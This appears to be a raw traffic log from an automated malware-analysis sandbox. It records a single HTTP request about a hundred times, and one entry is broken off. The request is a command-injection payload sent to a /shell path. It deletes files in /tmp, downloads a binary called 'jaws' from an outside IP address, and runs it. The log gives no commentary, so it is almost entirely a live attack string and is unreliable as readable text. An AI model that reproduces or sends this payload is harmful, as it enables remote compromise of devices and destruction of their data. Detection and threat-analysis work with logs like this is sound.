      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
